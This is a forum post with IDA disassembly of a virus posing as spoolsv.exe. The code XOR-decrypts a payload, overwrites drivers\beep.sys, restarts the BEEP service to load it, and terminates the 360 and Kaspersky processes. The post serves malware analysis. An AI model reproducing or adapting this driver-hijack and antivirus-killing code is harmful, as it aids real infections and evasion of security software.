近日,被学生的无知无畏搞的心神不宁,精神恍惚,本无心仔细分析此病毒;怎奈同事相求,只好勉强为之。起初只想重装系统草草了事,但次日又有问题,打印机不能用,只好抓出这个冒充spoolsv.exe的家伙研究一番。将其载入ida pro,一看启始代码就想骂人,花他妈的个头,还花呢,最后还是ida厉害,竟然能揪出如下的龌龊代码,稍微猜一下就知道他干什么了。感叹世事不公呀,国家培养出的人只能搞自家人,这就是现代教育的结果。
无语!其余的自己看吧!!!
seg004:1314F6C0 push ebp
seg004:1314F6C1 mov ebp, esp
seg004:1314F6C3 add esp, 0FFFFFE68h
seg004:1314F6C9 push ebx
seg004:1314F6CA push esi
seg004:1314F6CB push edi
seg004:1314F6CC mov [ebp-40h], eax
seg004:1314F6CF mov eax, eax
seg004:1314F6D1 call loc_1314F6E2
seg004:1314F6D6 aClosehandle db 'CloseHandle',0
seg004:1314F6E2
seg004:1314F6E2 loc_1314F6E2: ; CODE XREF: seg004:1314F6D1p
seg004:1314F6E2 pop dword ptr [ebp-4]
seg004:1314F6E5 mov esp, esp
seg004:1314F6E7 call loc_1314F6F5
seg004:1314F6EC aKernel32 db 'kernel32',0
seg004:1314F6F5
seg004:1314F6F5 loc_1314F6F5: ; CODE XREF: seg004:1314F6E7p
seg004:1314F6F5 pop dword ptr [ebp-8]
seg004:1314F6F8 mov ebp, ebp
seg004:1314F6FA call loc_1314F70B
seg004:1314F6FF aCreatefilea db 'CreateFileA',0
seg004:1314F70B
seg004:1314F70B loc_1314F70B: ; CODE XREF: seg004:1314F6FAp
seg004:1314F70B pop dword ptr [ebp-0Ch]
seg004:1314F70E nop
seg004:1314F70F call loc_1314F71D
seg004:1314F714 aAdvapi32 db 'Advapi32',0
seg004:1314F71D
seg004:1314F71D loc_1314F71D: ; CODE XREF: seg004:1314F70Fp
seg004:1314F71D pop dword ptr [ebp-10h]
seg004:1314F720 mov eax, eax
seg004:1314F722 call loc_1314F731
seg004:1314F727 aWritefile db 'WriteFile',0
seg004:1314F731
seg004:1314F731 loc_1314F731: ; CODE XREF: seg004:1314F722p
seg004:1314F731 pop dword ptr [ebp-14h]
seg004:1314F734 mov esp, esp
seg004:1314F736 call loc_1314F74F
seg004:1314F73B aGetsystemdirec db 'GetSystemDirectoryA',0
seg004:1314F74F
seg004:1314F74F loc_1314F74F: ; CODE XREF: seg004:1314F736p
seg004:1314F74F pop dword ptr [ebp-18h]
seg004:1314F752 mov eax, [ebp-8]
seg004:1314F755 push eax
seg004:1314F756 mov eax, [ebp-40h]
seg004:1314F759 call dword ptr [eax]
seg004:1314F75B mov esi, eax
seg004:1314F75D test esi, esi
seg004:1314F75F jz loc_1314FA30
seg004:1314F765 mov eax, [ebp-10h]
seg004:1314F768 push eax
seg004:1314F769 mov eax, [ebp-40h]
seg004:1314F76C call dword ptr [eax]
seg004:1314F76E mov ebx, eax
seg004:1314F770 test ebx, ebx
seg004:1314F772 jz loc_1314FA30
seg004:1314F778 mov edi, [ebp-40h]
seg004:1314F77B mov eax, [ebp-4]
seg004:1314F77E push eax
seg004:1314F77F push esi
seg004:1314F780 call dword ptr [edi+4]
seg004:1314F783 mov [ebp-64h], eax
seg004:1314F786 mov eax, [ebp-18h]
seg004:1314F789 push eax
seg004:1314F78A push esi
seg004:1314F78B call dword ptr [edi+4]
seg004:1314F78E mov [ebp-58h], eax
seg004:1314F791 mov eax, [ebp-0Ch]
seg004:1314F794 push eax
seg004:1314F795 push esi
seg004:1314F796 call dword ptr [edi+4]
seg004:1314F799 mov [ebp-5Ch], eax
seg004:1314F79C mov eax, [ebp-14h]
seg004:1314F79F push eax
seg004:1314F7A0 push esi
seg004:1314F7A1 call dword ptr [edi+4]
seg004:1314F7A4 mov [ebp-60h], eax
seg004:1314F7A7 call loc_1314F7BB
seg004:1314F7AC aOpenscmanagera db 'OpenSCManagerA',0
seg004:1314F7BB
seg004:1314F7BB loc_1314F7BB: ; CODE XREF: seg004:1314F7A7p
seg004:1314F7BB pop dword ptr [ebp-1Ch]
seg004:1314F7BE call loc_1314F7D0
seg004:1314F7C3 aOpenservicea db 'OpenServiceA',0
seg004:1314F7D0
seg004:1314F7D0 loc_1314F7D0: ; CODE XREF: seg004:1314F7BEp
seg004:1314F7D0 pop dword ptr [ebp-20h]
seg004:1314F7D3 call loc_1314F7E6
seg004:1314F7D8 aStartservicea db 'StartServiceA',0
seg004:1314F7E6
seg004:1314F7E6 loc_1314F7E6: ; CODE XREF: seg004:1314F7D3p
seg004:1314F7E6 pop dword ptr [ebp-24h]
seg004:1314F7E9 call loc_1314F7FD
seg004:1314F7EE aControlservice db 'ControlService',0
seg004:1314F7FD
seg004:1314F7FD loc_1314F7FD: ; CODE XREF: seg004:1314F7E9p
seg004:1314F7FD pop dword ptr [ebp-28h]
seg004:1314F800 mov edi, edi
seg004:1314F802 call loc_1314F81A
seg004:1314F807 aQueryservicest db 'QueryServiceStatus',0
seg004:1314F81A
seg004:1314F81A loc_1314F81A: ; CODE XREF: seg004:1314F802p
seg004:1314F81A pop dword ptr [ebp-2Ch]
seg004:1314F81D call loc_1314F835
seg004:1314F822 aCloseserviceha db 'CloseServiceHandle',0
seg004:1314F835
seg004:1314F835 loc_1314F835: ; CODE XREF: seg004:1314F81Dp
seg004:1314F835 pop dword ptr [ebp-30h]
seg004:1314F838 mov eax, eax
seg004:1314F83A
seg004:1314F83A loc_1314F83A:
seg004:1314F83A mov esi, [ebp-40h]
seg004:1314F83D mov eax, [ebp-1Ch]
seg004:1314F840 push eax
seg004:1314F841 push ebx
seg004:1314F842 call dword ptr [esi+4]
seg004:1314F845 mov edi, eax
seg004:1314F847 mov eax, [ebp-20h]
seg004:1314F84A push eax
seg004:1314F84B push ebx
seg004:1314F84C call dword ptr [esi+4]
seg004:1314F84F
seg004:1314F84F loc_1314F84F:
seg004:1314F84F mov [ebp-44h], eax
seg004:1314F852 mov eax, [ebp-24h]
seg004:1314F855 push eax
seg004:1314F856 push ebx
seg004:1314F857 call dword ptr [esi+4]
seg004:1314F85A mov [ebp-48h], eax
seg004:1314F85D mov eax, [ebp-28h]
seg004:1314F860 push eax
seg004:1314F861 push ebx
seg004:1314F862 call dword ptr [esi+4]
seg004:1314F865 mov [ebp-4Ch], eax
seg004:1314F868 mov eax, [ebp-2Ch]
seg004:1314F86B push eax
seg004:1314F86C push ebx
seg004:1314F86D
seg004:1314F86D loc_1314F86D:
seg004:1314F86D call dword ptr [esi+4]
seg004:1314F870 mov [ebp-50h], eax
seg004:1314F873 mov eax, [ebp-30h]
seg004:1314F876 push eax
seg004:1314F877 push ebx
seg004:1314F878 call dword ptr [esi+4]
seg004:1314F87B mov [ebp-54h], eax
seg004:1314F87E pusha
seg004:1314F87F call $+5
seg004:1314F884 pop ebx
seg004:1314F885 sub ebx, 45B178h
seg004:1314F88B
seg004:1314F88B loc_1314F88B:
seg004:1314F88B lea eax, [ebx+45B32Ch]
seg004:1314F891 mov [ebp-34h], eax
seg004:1314F894 lea eax, [ebx+45BE90h]
seg004:1314F89A sub eax, [ebp-34h]
seg004:1314F89D mov [ebp-38h], eax
seg004:1314F8A0
seg004:1314F8A0 loc_1314F8A0:
seg004:1314F8A0 call loc_1314F8AA
seg004:1314F8A5 aBeep db 'BEEP',0
seg004:1314F8AA
seg004:1314F8AA loc_1314F8AA: ; CODE XREF: seg004:loc_1314F8A0p
seg004:1314F8AA pop dword ptr [ebp-3Ch]
seg004:1314F8AD popa
seg004:1314F8AE mov eax, [ebp-38h]
seg004:1314F8B1 dec eax
seg004:1314F8B2 test eax, eax
seg004:1314F8B4 jb short loc_1314F8C3
seg004:1314F8B6 inc eax
seg004:1314F8B7
seg004:1314F8B7 loc_1314F8B7: ; CODE XREF: seg004:1314F8C1j
seg004:1314F8B7 mov edx, [ebp-34h]
seg004:1314F8BA xor byte ptr [edx], 69h
seg004:1314F8BD inc dword ptr [ebp-34h]
seg004:1314F8C0 dec eax
seg004:1314F8C1 jnz short loc_1314F8B7
seg004:1314F8C3
seg004:1314F8C3 loc_1314F8C3: ; CODE XREF: seg004:1314F8B4j
seg004:1314F8C3 push 104h
seg004:1314F8C8 lea eax, [ebp-195h]
seg004:1314F8CE push eax
seg004:1314F8CF call dword ptr [ebp-58h]
seg004:1314F8D2 mov byte ptr [ebp+eax-195h], '\'
seg004:1314F8DA mov byte ptr [ebp+eax-194h], 'd'
seg004:1314F8E2 mov byte ptr [ebp+eax-193h], 'r'
seg004:1314F8EA mov byte ptr [ebp+eax-192h], 'i'
seg004:1314F8F2 mov byte ptr [ebp+eax-191h], 'v'
seg004:1314F8FA mov byte ptr [ebp+eax-190h], 'e'
seg004:1314F902 mov byte ptr [ebp+eax-18Fh], 'r'
seg004:1314F90A mov byte ptr [ebp+eax-18Eh], 's'
seg004:1314F912 mov byte ptr [ebp+eax-18Dh], '\'
seg004:1314F91A mov byte ptr [ebp+eax-18Ch], 'b'
seg004:1314F922 mov byte ptr [ebp+eax-18Bh], 'e'
seg004:1314F92A mov byte ptr [ebp+eax-18Ah], 'e'
seg004:1314F932 mov byte ptr [ebp+eax-189h], 'p'
seg004:1314F93A mov byte ptr [ebp+eax-188h], '.'
seg004:1314F942 mov byte ptr [ebp+eax-187h], 's'
seg004:1314F94A mov byte ptr [ebp+eax-186h], 'y'
seg004:1314F952 mov byte ptr [ebp+eax-185h], 's'
seg004:1314F95A mov byte ptr [ebp+eax-184h], 0
seg004:1314F962 push 0F003Fh
seg004:1314F967 push 0
seg004:1314F969 push 0
seg004:1314F96B call edi
seg004:1314F96D mov esi, eax
seg004:1314F96F test esi, esi
seg004:1314F971 jbe loc_1314FA30
seg004:1314F977 push 0F01FFh
seg004:1314F97C mov eax, [ebp-3Ch]
seg004:1314F97F push eax
seg004:1314F980 push esi
seg004:1314F981 call dword ptr [ebp-44h]
seg004:1314F984 mov ebx, eax
seg004:1314F986 test ebx, ebx
seg004:1314F988 jbe loc_1314FA2C
seg004:1314F98E mov edi, 0Bh
seg004:1314F993
seg004:1314F993 loc_1314F993: ; CODE XREF: seg004:1314FA22j
seg004:1314F993 lea eax, [ebp-90h]
seg004:1314F999 push eax
seg004:1314F99A push 1
seg004:1314F99C push ebx
seg004:1314F99D call dword ptr [ebp-4Ch]
seg004:1314F9A0 lea eax, [ebp-90h]
seg004:1314F9A6 push eax
seg004:1314F9A7 push ebx
seg004:1314F9A8 call dword ptr [ebp-50h]
seg004:1314F9AB cmp eax, 1
seg004:1314F9AE sbb eax, eax
seg004:1314F9B0 inc eax
seg004:1314F9B1 mov [ebp-65h], al
seg004:1314F9B4 cmp byte ptr [ebp-65h], 0
seg004:1314F9B8 jz short loc_1314FA21
seg004:1314F9BA cmp dword ptr [ebp-8Ch], 1
seg004:1314F9C1 jnz short loc_1314FA21
seg004:1314F9C3 push 0
seg004:1314F9C5 push 0
seg004:1314F9C7 push 2
seg004:1314F9C9 push 0
seg004:1314F9CB push 1
seg004:1314F9CD push 40000000h
seg004:1314F9D2 lea eax, [ebp-195h]
seg004:1314F9D8 push eax
seg004:1314F9D9 call dword ptr [ebp-5Ch]
seg004:1314F9DC mov [ebp-70h], eax
seg004:1314F9DF cmp dword ptr [ebp-70h], 0FFFFFFFFh
seg004:1314F9E3 jz short loc_1314FA21
seg004:1314F9E5 push 0
seg004:1314F9E7 lea eax, [ebp-74h]
seg004:1314F9EA push eax
seg004:1314F9EB mov eax, [ebp-38h]
seg004:1314F9EE push eax
seg004:1314F9EF mov eax, [ebp-34h]
seg004:1314F9F2 push eax
seg004:1314F9F3 mov eax, [ebp-70h]
seg004:1314F9F6 push eax
seg004:1314F9F7 call dword ptr [ebp-60h]
seg004:1314F9FA cmp eax, 1
seg004:1314F9FD sbb eax, eax
seg004:1314F9FF inc eax
seg004:1314FA00 mov [ebp-65h], al
seg004:1314FA03 mov eax, [ebp-70h]
seg004:1314FA06 push eax
seg004:1314FA07 call dword ptr [ebp-64h]
seg004:1314FA0A cmp byte ptr [ebp-65h], 0
seg004:1314FA0E jz short loc_1314FA21
seg004:1314FA10 xor eax, eax
seg004:1314FA12 mov [ebp-6Ch], eax
seg004:1314FA15 lea eax, [ebp-6Ch]
seg004:1314FA18 push eax
seg004:1314FA19 push 0
seg004:1314FA1B push ebx
seg004:1314FA1C call dword ptr [ebp-48h]
seg004:1314FA1F jmp short loc_1314FA28
seg004:1314FA21
seg004:1314FA21 loc_1314FA21: ; CODE XREF: seg004:1314F9B8j
seg004:1314FA21 ; seg004:1314F9C1j ...
seg004:1314FA21 dec edi
seg004:1314FA22 jnz loc_1314F993
seg004:1314FA28
seg004:1314FA28 loc_1314FA28: ; CODE XREF: seg004:1314FA1Fj
seg004:1314FA28 push ebx
seg004:1314FA29 call dword ptr [ebp-54h]
seg004:1314FA2C
seg004:1314FA2C loc_1314FA2C: ; CODE XREF: seg004:1314F988j
seg004:1314FA2C push esi
seg004:1314FA2D call dword ptr [ebp-54h]
seg004:1314FA30
seg004:1314FA30 loc_1314FA30: ; CODE XREF: seg004:1314F75Fj
seg004:1314FA30 ; seg004:1314F772j ...
seg004:1314FA30 pop edi
seg004:1314FA31 pop esi
seg004:1314FA32 pop ebx
seg004:1314FA33 mov esp, ebp
seg004:1314FA35 pop ebp
seg004:1314FA36 retn
seg004:1315059C ; seg004:131508C6p
seg004:1315059C push ebp
seg004:1315059D mov ebp, esp
seg004:1315059F add esp, 0FFFFFE84h
seg004:131505A5 push ebx
seg004:131505A6 push esi
seg004:131505A7 push edi
seg004:131505A8 mov [ebp-3Ch], eax
seg004:131505AB mov eax, eax
seg004:131505AD call loc_131505BE
seg004:131505B2 aClosehandle_0 db 'CloseHandle',0
seg004:131505BE
seg004:131505BE loc_131505BE: ; CODE XREF: seg004:131505ADp
seg004:131505BE pop dword ptr [ebp-4]
seg004:131505C1 mov esp, esp
seg004:131505C3 call loc_131505D1
seg004:131505C8 aKernel32_0 db 'kernel32',0
seg004:131505D1
seg004:131505D1 loc_131505D1: ; CODE XREF: seg004:131505C3p
seg004:131505D1 pop dword ptr [ebp-8]
seg004:131505D4 mov ebp, ebp
seg004:131505D6 call loc_131505E7
seg004:131505DB aOpenprocess db 'OpenProcess',0
seg004:131505E7
seg004:131505E7 loc_131505E7: ; CODE XREF: seg004:131505D6p
seg004:131505E7 pop dword ptr [ebp-0Ch]
seg004:131505EA nop
seg004:131505EB call loc_131505F6
seg004:131505F0 aNtdll db 'Ntdll',0
seg004:131505F6
seg004:131505F6 loc_131505F6: ; CODE XREF: seg004:131505EBp
seg004:131505F6 pop dword ptr [ebp-10h]
seg004:131505F9 mov eax, eax
seg004:131505FB call loc_13150611
seg004:13150600 aTerminateproce db 'TerminateProcess',0
seg004:13150611
seg004:13150611 loc_13150611: ; CODE XREF: seg004:131505FBp
seg004:13150611 pop dword ptr [ebp-14h]
seg004:13150614 mov eax, [ebp-8]
seg004:13150617 push eax
seg004:13150618 mov eax, [ebp-3Ch]
seg004:1315061B
seg004:1315061B loc_1315061B:
seg004:1315061B call dword ptr [eax]
seg004:1315061D mov esi, eax
seg004:1315061F test esi, esi
seg004:13150621 jz loc_13150804
seg004:13150627 call loc_13150645
seg004:1315062C aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
seg004:13150645
seg004:13150645 loc_13150645: ; CODE XREF: seg004:13150627p
seg004:13150645 pop dword ptr [ebp-18h]
seg004:13150648 call loc_1315065C
seg004:1315064D aProcess32first db 'Process32First',0
seg004:1315065C
seg004:1315065C loc_1315065C: ; CODE XREF: seg004:13150648p
seg004:1315065C pop dword ptr [ebp-1Ch]
seg004:1315065F call loc_13150672
seg004:13150664 aProcess32next db 'Process32Next',0
seg004:13150672
seg004:13150672 loc_13150672: ; CODE XREF: seg004:1315065Fp
seg004:13150672 pop dword ptr [ebp-20h]
seg004:13150675 call loc_13150684
seg004:1315067A aLstrcmpia db 'lstrcmpiA',0
seg004:13150684
seg004:13150684 loc_13150684: ; CODE XREF: seg004:13150675p
seg004:13150684 pop dword ptr [ebp-24h]
seg004:13150687 mov edi, [ebp-3Ch]
seg004:1315068A mov eax, [ebp-14h]
seg004:1315068D push eax
seg004:1315068E push esi
seg004:1315068F call dword ptr [edi+4]
seg004:13150692
seg004:13150692 loc_13150692:
seg004:13150692 mov [ebp-40h], eax
seg004:13150695
seg004:13150695 loc_13150695:
seg004:13150695 mov eax, [ebp-0Ch]
seg004:13150698 push eax
seg004:13150699 push esi
seg004:1315069A call dword ptr [edi+4]
seg004:1315069D
seg004:1315069D loc_1315069D:
seg004:1315069D mov [ebp-54h], eax
seg004:131506A0 mov eax, [ebp-4]
seg004:131506A3 push eax
seg004:131506A4 push esi
seg004:131506A5 call dword ptr [edi+4]
seg004:131506A8 mov [ebp-50h], eax
seg004:131506AB mov eax, [ebp-18h]
seg004:131506AE push eax
seg004:131506AF push esi
seg004:131506B0 call dword ptr [edi+4]
seg004:131506B3
seg004:131506B3 loc_131506B3:
seg004:131506B3 mov [ebp-44h], eax
seg004:131506B6 mov eax, [ebp-1Ch]
seg004:131506B9 push eax
seg004:131506BA push esi
seg004:131506BB call dword ptr [edi+4]
seg004:131506BE
seg004:131506BE loc_131506BE:
seg004:131506BE mov [ebp-48h], eax
seg004:131506C1 mov eax, [ebp-20h]
seg004:131506C4 push eax
seg004:131506C5 push esi
seg004:131506C6 call dword ptr [edi+4]
seg004:131506C9 mov [ebp-4Ch], eax
seg004:131506CC
seg004:131506CC loc_131506CC:
seg004:131506CC mov eax, [ebp-24h]
seg004:131506CF push eax
seg004:131506D0 push esi
seg004:131506D1 call dword ptr [edi+4]
seg004:131506D4 mov ebx, eax
seg004:131506D6 mov eax, [ebp-10h]
seg004:131506D9 push eax
seg004:131506DA mov eax, [ebp-3Ch]
seg004:131506DD call dword ptr [eax]
seg004:131506DF mov esi, eax
seg004:131506E1
seg004:131506E1 loc_131506E1:
seg004:131506E1 test esi, esi
seg004:131506E3
seg004:131506E3 loc_131506E3:
seg004:131506E3 jz loc_13150804
seg004:131506E9
seg004:131506E9 loc_131506E9:
seg004:131506E9 call loc_13150700
seg004:131506EE aNtduplicateobj db 'NtDuplicateObject',0
seg004:13150700
seg004:13150700 loc_13150700: ; CODE XREF: seg004:loc_131506E9p
seg004:13150700 pop dword ptr [ebp-28h]
seg004:13150703 mov eax, [ebp-28h]
seg004:13150706 push eax
seg004:13150707 push esi
seg004:13150708 mov eax, [ebp-3Ch]
seg004:1315070B call dword ptr [eax+4]
seg004:1315070E mov [ebp-38h], eax
seg004:13150711 call loc_13150726
seg004:13150716 aSafeboxtray_ex db 'safeboxTray.exe',0
seg004:13150726
seg004:13150726 loc_13150726: ; CODE XREF: seg004:13150711p
seg004:13150726 pop dword ptr [ebp-2Ch]
seg004:13150729 call loc_13150736
seg004:1315072E aAvp_exe db 'avp.exe',0
seg004:13150736
seg004:13150736 loc_13150736: ; CODE XREF: seg004:13150729p
seg004:13150736 pop dword ptr [ebp-30h]
seg004:13150739 push 0
seg004:1315073B push 0Fh
seg004:1315073D call dword ptr [ebp-44h]
seg004:13150740 mov edi, eax
seg004:13150742 mov dword ptr [ebp-17Ch], 128h
seg004:1315074C
seg004:1315074C loc_1315074C:
seg004:1315074C lea eax, [ebp-17Ch]
seg004:13150752 push eax
seg004:13150753 push edi
seg004:13150754 call dword ptr [ebp-48h]
seg004:13150757
seg004:13150757 loc_13150757: ; CODE XREF: seg004:131507FAj
seg004:13150757 lea eax, [ebp-158h]
seg004:1315075D push eax
seg004:1315075E mov eax, [ebp-2Ch]
seg004:13150761 push eax
seg004:13150762
seg004:13150762 loc_13150762:
seg004:13150762 call ebx
seg004:13150764 test eax, eax
seg004:13150766 jnz short loc_131507A2
seg004:13150768 mov esi, [ebp-174h]
seg004:1315076E push esi
seg004:1315076F push 0
seg004:13150771 push 400h
seg004:13150776 call dword ptr [ebp-54h]
seg004:13150779 mov [ebp-34h], eax
seg004:1315077C cmp dword ptr [ebp-34h], 0
seg004:13150780
seg004:13150780 loc_13150780:
seg004:13150780 jbe short loc_131507A2
seg004:13150782 push 1
seg004:13150784 push 0
seg004:13150786
seg004:13150786 loc_13150786:
seg004:13150786 push 1F0FFFh
seg004:1315078B lea eax, [ebp-34h]
seg004:1315078E push eax
seg004:1315078F push 0FFFFFFFFh
seg004:13150791 push dword ptr [ebp-34h]
seg004:13150794 push 0FFFFFFFFh
seg004:13150796 call dword ptr [ebp-38h]
seg004:13150799 push 0
seg004:1315079B mov eax, [ebp-34h]
seg004:1315079E push eax
seg004:1315079F
seg004:1315079F loc_1315079F:
seg004:1315079F call dword ptr [ebp-40h]
seg004:131507A2
seg004:131507A2 loc_131507A2: ; CODE XREF: seg004:13150766j
seg004:131507A2 ; seg004:loc_13150780j
seg004:131507A2 lea eax, [ebp-158h]
seg004:131507A8 push eax
seg004:131507A9 mov eax, [ebp-30h]
seg004:131507AC push eax
seg004:131507AD call ebx
seg004:131507AF test eax, eax
seg004:131507B1 jnz short loc_131507ED
seg004:131507B3 mov esi, [ebp-174h]
seg004:131507B9 push esi
seg004:131507BA push 0
seg004:131507BC push 400h
seg004:131507C1 call dword ptr [ebp-54h]
seg004:131507C4 mov [ebp-34h], eax
seg004:131507C7 cmp dword ptr [ebp-34h], 0
seg004:131507CB jbe short loc_131507ED
seg004:131507CD push 1
seg004:131507CF push 0
seg004:131507D1 push 1F0FFFh
seg004:131507D6 lea eax, [ebp-34h]
seg004:131507D9 push eax
seg004:131507DA push 0FFFFFFFFh
seg004:131507DC push dword ptr [ebp-34h]
seg004:131507DF push 0FFFFFFFFh
seg004:131507E1 call dword ptr [ebp-38h]
seg004:131507E4 push 0
seg004:131507E6 mov eax, [ebp-34h]
seg004:131507E9 push eax
seg004:131507EA call dword ptr [ebp-40h]
seg004:131507ED
seg004:131507ED loc_131507ED: ; CODE XREF: seg004:131507B1j
seg004:131507ED ; seg004:131507CBj
seg004:131507ED lea eax, [ebp-17Ch]
seg004:131507F3 push eax
seg004:131507F4 push edi
seg004:131507F5 call dword ptr [ebp-4Ch]
seg004:131507F8 test eax, eax
seg004:131507FA jnz loc_13150757
seg004:13150800 push edi
seg004:13150801 call dword ptr [ebp-50h]
seg004:13150804
seg004:13150804 loc_13150804: ; CODE XREF: seg004:13150621j
seg004:13150804 ; seg004:loc_131506E3j
seg004:13150804 pop edi
seg004:13150805 pop esi
seg004:13150806 pop ebx
seg004:13150807 mov esp, ebp
seg004:13150809 pop ebp
seg004:1315080A retn
seg004:1315080C loc_1315080C:
seg004:1315080C push ebp
seg004:1315080D mov ebp, esp
seg004:1315080F add esp, 0FFFFFFECh
seg004:13150812 push ebx
seg004:13150813 push esi
seg004:13150814 push edi
seg004:13150815 mov ebx, [ebp+8]
seg004:13150818 mov eax, [ebx]
seg004:1315081A mov eax, [eax]
seg004:1315081C mov [ebx], eax
seg004:1315081E mov eax, [ebx+4]
seg004:13150821 mov eax, [eax]
seg004:13150823 mov [ebx+4], eax
seg004:13150826 call loc_13150834
seg004:1315082B aKernel32_1 db 'kernel32',0
seg004:13150834
seg004:13150834 loc_13150834: ; CODE XREF: seg004:13150826p
seg004:13150834 pop dword ptr [ebp-4]
seg004:13150837 call loc_13150847
seg004:1315083C aGetversion db 'GetVersion',0
seg004:13150847
seg004:13150847 loc_13150847: ; CODE XREF: seg004:13150837p
seg004:13150847 pop dword ptr [ebp-8]
seg004:1315084A call loc_13150856
seg004:1315084F aUser32 db 'user32',0
seg004:13150856
seg004:13150856 loc_13150856: ; CODE XREF: seg004:1315084Ap
seg004:13150856 pop dword ptr [ebp-0Ch]
seg004:13150859 call loc_1315086A
seg004:1315085E aMessageboxa_0 db 'MessageBoxA',0
seg004:1315086A
seg004:1315086A loc_1315086A: ; CODE XREF: seg004:13150859p
seg004:1315086A pop dword ptr [ebp-10h]
seg004:1315086D int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
seg004:1315086D ; DS:SI -> counted CR-terminated command string
seg004:1315086F mov eax, [ebp-4]
seg004:13150872 push eax
seg004:13150873 call dword ptr [ebx]
seg004:13150875 mov esi, eax
seg004:13150877 test esi, esi
seg004:13150879 jz short loc_131508ED
seg004:1315087B mov eax, [ebp-8]
seg004:1315087E push eax
seg004:1315087F push esi
seg004:13150880 call dword ptr [ebx+4]
seg004:13150883 mov edi, eax
seg004:13150885
seg004:13150885 loc_13150885:
seg004:13150885 mov eax, [ebp-0Ch]
seg004:13150888 push eax
seg004:13150889 call dword ptr [ebx]
seg004:1315088B mov esi, eax
seg004:1315088D test esi, esi
seg004:1315088F jz short loc_131508ED
seg004:13150891 mov eax, [ebp-10h]
seg004:13150894 push eax
seg004:13150895 push esi
seg004:13150896 call dword ptr [ebx+4]
seg004:13150899 mov [ebp-14h], eax
seg004:1315089C push 0
seg004:1315089E mov eax, [ebp-0Ch]
seg004:131508A1 push eax
seg004:131508A2 mov eax, [ebp-4]
seg004:131508A5 push eax
seg004:131508A6 push 0FFFFFFFFh
seg004:131508A8 call dword ptr [ebp-14h]
seg004:131508AB call edi
seg004:131508AD cmp eax, 80000000h
seg004:131508B2 setb al
seg004:131508B5 test al, al
seg004:131508B7 jz short loc_131508D6
seg004:131508B9 mov eax, ebx
seg004:131508BB call loc_1315059C
seg004:131508C0 nop
seg004:131508C1 nop
seg004:131508C2 nop
seg004:131508C3 nop
seg004:131508C4 mov eax, ebx
seg004:131508C6 call loc_1315059C
seg004:131508CB nop
seg004:131508CC nop
seg004:131508CD nop
seg004:131508CE nop
seg004:131508CF mov eax, ebx
seg004:131508D1
seg004:131508D1 loc_131508D1:
seg004:131508D1 call loc_1314F6C0
seg004:131508D6
seg004:131508D6 loc_131508D6: ; CODE XREF: seg004:131508B7j
seg004:131508D6 mov esi, [ebx+8]
seg004:131508D9 mov dl, [ebx+14h]
seg004:131508DC mov eax, [ebx+0Ch]
seg004:131508DF dec eax
seg004:131508E0 test eax, eax
seg004:131508E2 jb short loc_131508EB
seg004:131508E4 inc eax
seg004:131508E5
seg004:131508E5 loc_131508E5: ; CODE XREF: seg004:131508E9j
seg004:131508E5 xor [esi], dl
seg004:131508E7 inc esi
seg004:131508E8 dec eax
seg004:131508E9 jnz short loc_131508E5
seg004:131508EB
seg004:131508EB loc_131508EB: ; CODE XREF: seg004:131508E2j
seg004:131508EB int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
seg004:131508EB ; DS:SI -> counted CR-terminated command string
seg004:131508ED
seg004:131508ED loc_131508ED: ; CODE XREF: seg004:13150879j
seg004:131508ED ; seg004:1315088Fj
seg004:131508ED pop edi
seg004:131508EE pop esi
seg004:131508EF pop ebx
seg004:131508F0 mov esp, ebp
seg004:131508F2 pop ebp
seg004:131508F3 retn 4
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课